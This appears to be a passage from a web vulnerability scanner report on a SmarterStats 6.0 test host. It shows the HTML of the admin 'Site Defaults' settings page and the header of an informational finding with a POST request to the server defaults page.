if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel3',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Site Defaults
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Auto-Deletion</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel3">
   
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdministrativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDefaultSmarterLogDirText">
                   <td id="ctl00_MPH_txtDefaultSmarterLogDirText_Label" class="Indent Fixed">SmarterLog Path</td><td id="ctl00_MPH_txtDefaultSmarterLogDirText_Setting" class="Setting"><input name="ctl00$MPH$txtDefaultSmarterLogDirText_SettingText" type="text" value="C:\SmarterLogs\" id="ctl00_MPH_txtDefaultSmarterLogDirText_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstTimeZone">
                   <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><select name="ctl00$MPH$lstTimeZone_SettingDropDown" id="ctl00_MPH_lstTimeZone_SettingDropDown">
                       <option value="0">(GMT-12:00) International Date Line West</option>
                       <option selected="selected" value="1">(GMT-11:00) Midway Island, Samoa</option>
                       <option value="2">(GMT-10:00) Hawaii</option>
                       <option value="3">(GMT-09:00) Alaska</option>
                       <option value="-2147483579">(GMT-08:00) Tijuana, Baja California</option>
                       <option value="4">(GMT-08:00) Pacific Time (US &amp; Canada)</option>
                       <option value="-2147483580">(GMT-07:00) Chihuahua, La Paz, Mazatlan - New</option>
                       <option value="10">(GMT-07:00) Mountain Time (US &amp; Canada)</option>
                       <option value="15">(GMT-07:00) Arizona</option>
                       <option value="13">(GMT-07:00) Chihuahua, La Paz, Mazatlan - Old</option>
                       <option value="25">(GMT-06:00) Saskatchewan</option>
                       <option value="30">(GMT-06:00) Guadalajara, Mexico City, Monterrey - Old</option>
                       <option value="20">(GMT-06:00) Central Time (US &amp; Canada)</option>
                       <option value="-2147483581">(GMT-06:00) Guadalajara, Mexico City, Monterrey - New</option>
                       <option value="33">(GMT-06:00) Central America</option>
                       <option value="35">(GMT-05:00) Eastern Time (US &amp; Canada)</option>
                       <option value="40">(GMT-05:00) Indiana (East)</option>
                       <option value="45">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>
                       <option value="-2147483573">(GMT-04:30) Caracas</option>
                       <option value="-2147483576">(GMT-04:00) Manaus</option>
                       <option value="50">(GMT-04:00) Atlantic Time (Canada)</option>
                       <option value="55">(GMT-04:00) La Paz</option>
                       <option value="56">(GMT-04:00) Santiago</option>
                       <option value="60">(GMT-03:30) Newfoundland</option>
                       <option value="70">(GMT-03:00) Buenos Aires, Georgetown</option>
                       <option value="73">(GMT-03:00) Greenland</option>
                       <option value="65">(GMT-03:00) Brasilia</option>
                       <option value="-2147483575">(GMT-03:00) Montevideo</option>
                       <option value="75">(GMT-02:00) Mid-Atlantic</option>
                       <option value="80">(GMT-01:00) Azores</option>
                       <option value="83">(GMT-01:00) Cape Verde Is.</option>
                       <option value="90">(GMT) Casablanca, Monrovia, Reykjavik</option>
                       <option value="85">(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</option>
                       <option value="95">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>
                       <option value="100">(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</option>
                       <option value="105">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>
                       <option value="110">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>
                       <option value="113">(GMT+01:00) West Central Africa</option>
                       <option value="130">(GMT+02:00) Athens, Bucharest, Istanbul</option>
                       <option value="-2147483583">(GMT+02:00) Beirut</option>
                       <option value="-2147483582">(GMT+02:00) Amman</option>
                       <option value="135">(GMT+02:00) Jerusalem</option>
                       <option value="-2147483578">(GMT+02:00) Windhoek</option>
                       <option value="125">(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</option>
                       <option value="140">(GMT+02:00) Harare, Pretoria</option>
                       <option value="115">(GMT+02:00) Minsk</option>
                       <option value="120">(GMT+02:00) Cairo</option>
                       <option value="155">(GMT+03:00) Nairobi</option>
                       <option value="145">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>
                       <option value="150">(GMT+03:00) Kuwait, Riyadh</option>
                       <option value="158">(GMT+03:00) Baghdad</option>
                       <option value="-2147483577">(GMT+03:00) Tbilisi</option>
                       <option value="160">(GMT+03:30) Tehran</option>
                       <option value="165">(GMT+04:00) Abu Dhabi, Muscat</option>
                       <option value="170">(GMT+04:00) Caucasus Standard Time</option>
                       <option value="-2147483584">(GMT+04:00) Baku</option>
                       <option value="-2147483574">(GMT+04:00) Yerevan</option>
                       <option value="175">(GMT+04:30) Kabul</option>
                       <option value="180">(GMT+05:00) Ekaterinburg</option>
                       <option value="185">(GMT+05:00) Islamabad, Karachi, Tashkent</option>
                       <option value="200">(GMT+05:30) Sri Jayawardenepura</option>
                       <option value="190">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>
                       <option value="193">(GMT+05:45) Kathmandu</option>
                       <option value="201">(GMT+06:00) Almaty, Novosibirsk</option>
                       <option value="195">(GMT+06:00) Astana, Dhaka</option>
                       <option value="203">(GMT+06:30) Yangon (Rangoon)</option>
                       <option value="207">(GMT+07:00) Krasnoyarsk</option>
                       <option value="205">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>
                       <option value="225">(GMT+08:00) Perth</option>
                       <option value="210">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>
                       <option value="227">(GMT+08:00) Irkutsk, Ulaan Bataar</option>
                       <option value="220">(GMT+08:00) Taipei</option>
                       <option value="215">(GMT+08:00) Kuala Lumpur, Singapore</option>
                       <option value="240">(GMT+09:00) Yakutsk</option>
                       <option value="230">(GMT+09:00) Seoul</option>
                       <option value="235">(GMT+09:00) Osaka, Sapporo, Tokyo</option>
                       <option value="250">(GMT+09:30) Adelaide</option>
                       <option value="245">(GMT+09:30) Darwin</option>
                       <option value="275">(GMT+10:00) Guam, Port Moresby</option>
                       <option value="255">(GMT+10:00) Canberra, Melbourne, Sydney</option>
                       <option value="270">(GMT+10:00) Vladivostok</option>
                       <option value="260">(GMT+10:00) Brisbane</option>
                       <option value="265">(GMT+10:00) Hobart</option>
                       <option value="280">(GMT+11:00) Magadan, Solomon Is., New Caledonia</option>
                       <option value="285">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>
                       <option value="290">(GMT+12:00) Auckland, Wellington</option>
                       <option value="300">(GMT+13:00) Nuku&#39;alofa</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkSeoEnabled">
                   <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
               </tr><tr id="ctl00_MPH_txtDefaultDocuments">
                   <td id="ctl00_MPH_txtDefaultDocuments_Setting" class="Indent Setting" colspan="2"><span class='Label'>Default Documents (one per line)<br /></span><textarea name="ctl00$MPH$txtDefaultDocuments_SettingText" rows="4" cols="50" id="ctl00_MPH_txtDefaultDocuments_SettingText" class="text">

index.htm
index.html
default.asp
default.aspx</textarea></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_AutoDeletionTab' class='' style='display:none'>
           <span id="ctl00_MPH_AutoDeletionTab">
                   <table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstMonthsToKeepSmStats">
                   <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">SmarterLogs</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                       <option value="0">Never Delete</option>
                       <option selected="selected" value="1">Delete after 1 months</option>
                       <option value="2">Delete after 2 months</option>
                       <option value="3">Delete after 3 months</option>
                       <option value="4">Delete after 4 months</option>
                       <option value="5">Delete after 5 months</option>
                       <option value="6">Delete after 6 months</option>
                       <option value="7">Delete after 7 months</option>
                       <option value="8">Delete after 8 months</option>
                       <option value="9">Delete after 9 months</option>
                       <option value="10">Delete after 10 months</option>
                       <option value="11">Delete after 11 months</option>
                       <option value="12">Delete after 12 months</option>
                       <option value="13">Delete after 13 months</option>
                       <option value="14">Delete after 14 months</option>
                       <option value="15">Delete after 15 months</option>
                       <option value="16">Delete after 16 months</option>
                       <option value="17">Delete after 17 months</option>
                       <option value="18">Delete after 18 months</option>
                       <option value="19">Delete after 19 months</option>
                       <option value="20">Delete after 20 months</option>
                       <option value="21">Delete after 21 months</option>
                       <option value="22">Delete after 22 months</option>
                       <option value="23">Delete after 23 months</option>
                       <option value="24">Delete after 24 months</option>
                       <option value="25">Delete after 25 months</option>
                       <option value="26">Delete after 26 months</option>
                       <option value="27">Delete after 27 months</option>
                       <option value="28">Delete after 28 months</option>
                       <option value="29">Delete after 29 months</option>
                       <option value="30">Delete after 30 months</option>
                       <option value="31">Delete after 31 months</option>
                       <option value="32">Delete after 32 months</option>
                       <option value="33">Delete after 33 months</option>
                       <option value="34">Delete after 34 months</option>
                       <option value="35">Delete after 35 months</option>
                       <option value="36">Delete after 36 months</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstDefaultLogFileDays">
                   <td id="ctl00_MPH_lstDefaultLogFileDays_Label" class="Indent Fixed">Original Logs</td><td id="ctl00_MPH_lstDefaultLogFileDays_Setting" class="Setting"><select name="ctl00$MPH$lstDefaultLogFileDays_SettingDropDown" id="ctl00_MPH_lstDefaultLogFileDays_SettingDropDown">
                       <option value="0">Never Delete</option>
                       <option selected="selected" value="1">Delete after 1 days</option>
                       <option value="2">Delete after 2 days</option>
                       <option value="3">Delete after 3 days</option>
                       <option value="4">Delete after 4 days</option>
                       <option value="5">Delete after 5 days</option>
                       <option value="6">Delete after 6 days</option>
                       <option value="7">Delete after 7 days</option>
                       <option value="8">Delete after 8 days</option>
                       <option value="9">Delete after 9 days</option>
                       <option value="10">Delete after 10 days</option>
                       <option value="11">Delete after 11 days</option>
                       <option value="12">Delete after 12 days</option>
                       <option value="13">Delete after 13 days</option>
                       <option value="14">Delete after 14 days</option>
                       <option value="21">Delete after 21 days</option>
                       <option value="30">Delete after 1 months</option>
                       <option value="60">Delete after 2 months</option>
                       <option value="90">Delete after 3 months</option>
                       <option value="120">Delete after 4 months</option>
                       <option value="150">Delete after 5 months</option>
                       <option value="180">Delete after 6 months</option>
                       <option value="210">Delete after 7 months</option>
                       <option value="240">Delete after 8 months</option>
                       <option value="270">Delete after 9 months</option>
                       <option value="300">Delete after 10 months</option>
                       <option value="330">Delete after 11 months</option>
                       <option value="360">Delete after 12 months</option>
                       <option value="390">Delete after 13 months</option>
                       <option value="420">Delete after 14 months</option>
                       <option value="450">Delete after 15 months</option>
                       <option value="480">Delete after 16 months</option>
                       <option value="510">Delete after 17 months</option>
                       <option value="540">Delete after 18 months</option>
                       <option value="570">Delete after 19 months</option>
                       <option value="600">Delete after 20 months</option>
                       <option value="630">Delete after 21 months</option>
                       <option value="660">Delete after 22 months</option>
                       <option value="690">Delete after 23 months</option>
                       <option value="720">Delete after 24 months</option>
                       <option value="750">Delete after 25 months</option>
                       <option value="780">Delete after 26 months</option>
                       <option value="810">Delete after 27 months</option>
                       <option value="840">Delete after 28 months</option>
                       <option value="870">Delete after 29 months</option>
                       <option value="900">Delete after 30 months</option>
                       <option value="930">Delete after 31 months</option>
                       <option value="960">Delete after 32 months</option>
                       <option value="990">Delete after 33 months</option>
                       <option value="1020">Delete after 34 months</option>
                       <option value="1050">Delete after 35 months</option>
                       <option value="1080">Delete after 36 months</option>

                   </select></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_SeoOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_SeoOptionsTab">
                   <table id="ctl00_MPH_ucSiteSeoSettings_tblSEO" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Label" class="Indent Fixed">Max Keywords</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Label" class="Indent Fixed">Max Competitors</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxCompetitors_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking">
                   <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Label" class="Indent Fixed">Max Position to Retrieve</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxRanking_SettingText" type="text" value="100" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText" class="text" /></td>
               </tr>
           </table>
                   <table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_tblSeoSearchEngines" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines">
                   <td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Label" class="Indent Fixed">Search Engines</td><td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Setting" class="Setting"><table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                       <tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$8" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$15" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$9" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$16" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$10" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$17" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$11" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$18" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$4" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$12" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$19" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$5" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$13" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$20" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$6" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$14" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$21" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$7" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                       </tr>
                   </table></td>
               </tr>
           </table>

               </span></div>
       
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/defaults/frmdefaultsitesettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('Site\x20Defaults'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_AutoDeletionTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_SeoOptionsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"SmarterLog Path","vcID":"ctl00_MPH_txtDefaultSmarterLogDirText_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
//]]>
</script>
</form>
</body>
</html>


11.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmServerDefaults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/Defaults/frmServerDefaults.aspx

Request

POST /Admin/Defaults/frmServerDefaults.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmServerDefaults.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}; ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c;
Content-Type: application/x-www-form-urlencoded
Content-Length: 9425

